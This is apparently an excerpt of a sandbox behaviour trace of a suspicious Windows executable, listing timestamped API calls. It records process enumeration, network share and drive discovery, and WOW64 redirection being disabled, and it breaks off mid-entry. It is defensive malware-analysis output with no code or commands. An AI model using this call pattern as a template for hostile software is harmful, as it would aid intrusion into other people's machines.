[0202.072] lstrlenW (lpString="svchost.exe") returned 11 [0202.072] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.100] lstrlenW (lpString="svchost.exe") returned 11 [0202.100] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.101] lstrlenW (lpString="svchost.exe") returned 11 [0202.101] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.101] lstrlenW (lpString="svchost.exe") returned 11 [0202.101] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.102] lstrlenW (lpString="svchost.exe") returned 11 [0202.103] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.103] lstrlenW (lpString="svchost.exe") returned 11 [0202.103] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.104] lstrlenW (lpString="svchost.exe") returned 11 [0202.104] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0202.105] lstrlenW (lpString="spoolsv.exe") returned 11 [0202.105] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.106] lstrlenW (lpString="svchost.exe") returned 11 [0202.106] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0202.106] lstrlenW (lpString="audiodg.exe") returned 11 [0202.106] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0202.107] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0202.107] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0202.108] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0202.108] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0202.109] lstrlenW (lpString="Memory Compression") returned 18 [0202.109] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0202.110] lstrlenW (lpString="sihost.exe") returned 10 [0202.110] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.110] lstrlenW (lpString="svchost.exe") returned 11 [0202.110] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0202.111] lstrlenW (lpString="msoia.exe") returned 9 [0202.111] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0202.112] lstrlenW (lpString="taskhostw.exe") returned 13 [0202.112] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.113] lstrlenW (lpString="explorer.exe") returned 12 [0202.113] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0202.113] lstrlenW (lpString="SearchUI.exe") returned 12 [0202.114] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0202.114] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0202.114] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0202.115] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0202.115] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0202.116] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0202.116] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0202.117] lstrlenW (lpString="hgaibc.exe") returned 10 [0202.117] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0202.117] CloseHandle (hObject=0x3a4) returned 1 [0202.118] Sleep (dwMilliseconds=0x1f4) Thread: id = 84 os_tid = 0x8bc [0177.909] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x80 [0179.914] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c49f0 | out: hHeap=0x680000) returned 1 Thread: id = 85 os_tid = 0xc68 [0177.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6dddf0 [0177.909] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6dddf0, Size=0x20) returned 0x6bed68 [0177.909] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6bed68, Size=0x40) returned 0x697948 [0177.909] GetLogicalDrives () returned 0x4 [0177.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x6faff0 [0177.910] GetComputerNameW (in: lpBuffer=0x6faff4, nSize=0x26dff64 | out: lpBuffer="NQDPDE", nSize=0x26dff64) returned 1 [0177.910] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1000) returned 0x6e0e78 [0177.910] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x26dff34 | out: lphEnum=0x26dff34*=0x696160) returned 0x0 [0177.911] WNetEnumResourceW (in: hEnum=0x696160, lpcCount=0x26dff30, lpBuffer=0x6e0e78, lpBufferSize=0x26dff38 | out: lpcCount=0x26dff30, lpBuffer=0x6e0e78, lpBufferSize=0x26dff38) returned 0x103 [0177.912] WNetCloseEnum (hEnum=0x696160) returned 0x0 [0177.912] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x26dff34 | out: lphEnum=0x26dff34*=0x69a670) returned 0x0 [0177.930] WNetEnumResourceW (in: hEnum=0x69a670, lpcCount=0x26dff30, lpBuffer=0x6e0e78, lpBufferSize=0x26dff38 | out: lpcCount=0x26dff30, lpBuffer=0x6e0e78, lpBufferSize=0x26dff38) returned 0x0 [0177.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1000) returned 0x70fc50 [0177.931] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x6e0e78, lphEnum=0x26dff08 | out: lphEnum=0x26dff08*=0x696340) returned 0x0 [0177.933] WNetEnumResourceW (in: hEnum=0x696340, lpcCount=0x26dff04, lpBuffer=0x70fc50, lpBufferSize=0x26dff0c | out: lpcCount=0x26dff04, lpBuffer=0x70fc50, lpBufferSize=0x26dff0c) returned 0x103 [0177.933] WNetCloseEnum (hEnum=0x696340) returned 0x0 [0177.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1000) returned 0x70dc40 [0177.933] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x6e0e98, lphEnum=0x26dff08 | out: lphEnum=0x26dff08*=0x0) returned 0x4b8 [0194.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1000) returned 0x71bcb0 [0194.526] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x6e0eb8, lphEnum=0x26dff08 | out: lphEnum=0x26dff08*=0x0) returned 0x4c6 [0194.528] WNetEnumResourceW (in: hEnum=0x69a670, lpcCount=0x26dff30, lpBuffer=0x6e0e78, lpBufferSize=0x26dff38 | out: lpcCount=0x26dff30, lpBuffer=0x6e0e78, lpBufferSize=0x26dff38) returned 0x103 [0194.528] WNetCloseEnum (hEnum=0x69a670) returned 0x0 [0194.528] GetLogicalDrives () returned 0x4 [0194.528] Sleep (dwMilliseconds=0x64) [0194.642] GetLogicalDrives () returned 0x4 [0194.642] Sleep (dwMilliseconds=0x64) [0194.766] GetLogicalDrives () returned 0x4 [0194.766] Sleep (dwMilliseconds=0x64) [0194.875] GetLogicalDrives () returned 0x4 [0194.875] Sleep (dwMilliseconds=0x64) [0194.991] GetLogicalDrives () returned 0x4 [0194.991] Sleep (dwMilliseconds=0x64) [0195.100] GetLogicalDrives () returned 0x4 [0195.100] Sleep (dwMilliseconds=0x64) [0195.210] GetLogicalDrives () returned 0x4 [0195.210] Sleep (dwMilliseconds=0x64) [0195.319] GetLogicalDrives () returned 0x4 [0195.319] Sleep (dwMilliseconds=0x64) [0195.428] GetLogicalDrives () returned 0x4 [0195.429] Sleep (dwMilliseconds=0x64) [0195.538] GetLogicalDrives () returned 0x4 [0195.538] Sleep (dwMilliseconds=0x64) [0195.647] GetLogicalDrives () returned 0x4 [0195.647] Sleep (dwMilliseconds=0x64) [0195.892] GetLogicalDrives () returned 0x4 [0195.892] Sleep (dwMilliseconds=0x64) [0195.997] GetLogicalDrives () returned 0x4 [0195.997] Sleep (dwMilliseconds=0x64) [0196.131] GetLogicalDrives () returned 0x4 [0196.131] Sleep (dwMilliseconds=0x64) [0196.590] GetLogicalDrives () returned 0x4 [0196.590] Sleep (dwMilliseconds=0x64) [0196.775] GetLogicalDrives () returned 0x4 [0196.775] Sleep (dwMilliseconds=0x64) [0197.158] GetLogicalDrives () returned 0x4 [0197.182] Sleep (dwMilliseconds=0x64) [0197.595] GetLogicalDrives () returned 0x4 [0197.595] Sleep (dwMilliseconds=0x64) [0198.118] GetLogicalDrives () returned 0x4 [0198.118] Sleep (dwMilliseconds=0x64) [0198.639] GetLogicalDrives () returned 0x4 [0198.639] Sleep (dwMilliseconds=0x64) [0198.914] GetLogicalDrives () returned 0x4 [0198.914] Sleep (dwMilliseconds=0x64) [0199.218] GetLogicalDrives () returned 0x4 [0199.218] Sleep (dwMilliseconds=0x64) [0199.503] GetLogicalDrives () returned 0x4 [0199.503] Sleep (dwMilliseconds=0x64) [0199.838] GetLogicalDrives () returned 0x4 [0199.838] Sleep (dwMilliseconds=0x64) [0200.193] GetLogicalDrives () returned 0x4 [0200.193] Sleep (dwMilliseconds=0x64) [0200.520] GetLogicalDrives () returned 0x4 [0200.520] Sleep (dwMilliseconds=0x64) [0200.710] GetLogicalDrives () returned 0x4 [0200.710] Sleep (dwMilliseconds=0x64) [0201.774] GetLogicalDrives () returned 0x4 [0201.774] Sleep (dwMilliseconds=0x64) [0202.118] GetLogicalDrives () returned 0x4 [0202.118] Sleep (dwMilliseconds=0x64) Thread: id = 86 os_tid = 0x998 [0177.940] GetTickCount () returned 0x18075 [0177.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x695718 [0177.940] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x695718, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c8 [0177.941] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x695718, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2cc [0177.942] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x695718, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2d0 [0177.942] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x695718, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2d4 [0177.943] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddc88 [0177.943] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddc88, Size=0x20) returned 0x6bed90 [0177.943] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddd00 [0177.943] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddd00, Size=0x20) returned 0x6beea8 [0177.944] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0177.944] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0177.944] Wow64DisableWow64FsRedirection (in: OldValue=0x281ff7c | out: OldValue=0x281ff7c*=0x0) returned 1 [0177.944] lstrlenW (lpString="kernel32.dll") returned 12 [0177.944] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bed90 | out: hHeap=0x680000) returned 1 [0177.944] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0177.944] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beea8 | out: hHeap=0x680000) returned 1 [0177.944] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x6c7778, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2d8 [0177.945] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0178.190] GetTickCount () returned 0x1816f [0178.190] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0178.456] GetTickCount () returned 0x18279 [0178.456] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0178.844] GetTickCount () returned 0x183f0 [0178.844] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0179.405] GetTickCount () returned 0x18623 [0179.405] GetTickCount () returned 0x18623 [0179.406] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0179.694] GetTickCount () returned 0x1874b [0179.694] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0179.996] GetTickCount () returned 0x18874 [0179.996] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0181.561] GetTickCount () returned 0x18e9e [0181.561] GetTickCount () returned 0x18e9e [0181.561] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0182.361] GetTickCount () returned 0x191bb [0182.361] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0182.785] GetTickCount () returned 0x19361 [0182.785] GetTickCount () returned 0x19361 [0182.785] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0183.263] GetTickCount () returned 0x19536 [0183.263] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0184.256] GetTickCount () returned 0x1991e [0184.256] GetTickCount () returned 0x1991e [0184.256] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0184.682] GetTickCount () returned 0x19ac4 [0184.682] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0185.109] GetTickCount () returned 0x19c79 [0185.109] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0185.408] GetTickCount () returned 0x19da2 [0185.408] GetTickCount () returned 0x19da2 [0185.408] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0185.594] GetTickCount () returned 0x19e5e [0185.594] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0185.720] GetTickCount () returned 0x19edb [0185.720] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0185.887] GetTickCount () returned 0x19f87 [0185.887] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0186.078] GetTickCount () returned 0x1a042 [0186.078] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0186.467] GetTickCount () returned 0x1a1c9 [0186.467] GetTickCount () returned 0x1a1c9 [0186.467] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0186.673] GetTickCount () returned 0x1a294 [0186.673] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0186.859] GetTickCount () returned 0x1a34f [0186.859] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0186.995] GetTickCount () returned 0x1a3cc [0186.995] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0187.136] GetTickCount () returned 0x1a459 [0187.136] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0187.280] GetTickCount () returned 0x1a4f5 [0187.280] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0187.398] GetTickCount () returned 0x1a563 [0187.399] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0187.512] GetTickCount () returned 0x1a5d0 [0187.512] GetTickCount () returned 0x1a5d0 [0187.512] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0187.609] GetTickCount () returned 0x1a63d [0187.609] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0187.721] GetTickCount () returned 0x1a6ab [0187.721] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0187.828] GetTickCount () returned 0x1a718 [0187.828] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0187.946] GetTickCount () returned 0x1a785 [0187.946] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0188.235] GetTickCount () returned 0x1a8ae [0188.236] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0188.343] GetTickCount () returned 0x1a91c [0188.343] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0188.490] GetTickCount () returned 0x1a9a8 [0188.490] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0188.593] GetTickCount () returned 0x1aa16 [0188.593] GetTickCount () returned 0x1aa16 [0188.593] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0188.734] GetTickCount () returned 0x1aaa2 [0188.734] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0188.846] GetTickCount () returned 0x1ab10 [0188.846] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0188.952] GetTickCount () returned 0x1ab7d [0188.952] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0189.062] GetTickCount () returned 0x1abea [0189.062] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0189.171] GetTickCount () returned 0x1ac58 [0189.171] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0189.281] GetTickCount () returned 0x1acc5 [0189.281] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0189.390] GetTickCount () returned 0x1ad33 [0189.390] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0189.517] GetTickCount () returned 0x1adb0 [0189.518] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0189.625] GetTickCount () returned 0x1ae1d [0189.625] GetTickCount () returned 0x1ae1d [0189.625] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0189.733] GetTickCount () returned 0x1ae8a [0189.734] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0189.843] GetTickCount () returned 0x1aef8 [0189.843] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0189.961] GetTickCount () returned 0x1af65 [0189.961] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0190.063] GetTickCount () returned 0x1afd2 [0190.063] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0190.184] GetTickCount () returned 0x1b040 [0190.184] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0190.282] GetTickCount () returned 0x1b0ad [0190.282] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0190.391] GetTickCount () returned 0x1b11b [0190.391] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0190.501] GetTickCount () returned 0x1b188 [0190.501] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0190.610] GetTickCount () returned 0x1b1f5 [0190.610] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0190.782] GetTickCount () returned 0x1b2a1 [0190.782] GetTickCount () returned 0x1b2a1 [0190.782] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0190.916] GetTickCount () returned 0x1b31e [0190.916] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0191.016] GetTickCount () returned 0x1b38c [0191.016] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0191.226] GetTickCount () returned 0x1b457 [0191.226] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0191.346] GetTickCount () returned 0x1b4d4 [0191.346] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0191.454] GetTickCount () returned 0x1b541 [0191.454] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0191.563] GetTickCount () returned 0x1b5ae [0191.563] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0191.672] GetTickCount () returned 0x1b61c [0191.672] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0191.782] GetTickCount () returned 0x1b689 [0191.782] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0191.906] GetTickCount () returned 0x1b6f7 [0191.906] GetTickCount () returned 0x1b6f7 [0191.906] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0192.016] GetTickCount () returned 0x1b774 [0192.016] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0194.454] GetTickCount () returned 0x1c0f9 [0194.454] GetTickCount () returned 0x1c0f9 [0194.454] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0194.596] GetTickCount () returned 0x1c186 [0194.597] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0194.704] GetTickCount () returned 0x1c1f3 [0194.704] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0194.813] GetTickCount () returned 0x1c260 [0194.813] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0194.923] GetTickCount () returned 0x1c2ce [0194.923] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0195.054] GetTickCount () returned 0x1c34b [0195.054] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0195.163] GetTickCount () returned 0x1c3b8 [0195.163] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0195.272] GetTickCount () returned 0x1c426 [0195.272] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0195.398] GetTickCount () returned 0x1c4a3 [0195.398] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0195.514] GetTickCount () returned 0x1c510 [0195.514] GetTickCount () returned 0x1c510 [0195.514] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0195.616] GetTickCount () returned 0x1c57d [0195.616] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0195.887] GetTickCount () returned 0x1c687 [0195.887] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0195.982] GetTickCount () returned 0x1c6f4 [0195.982] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 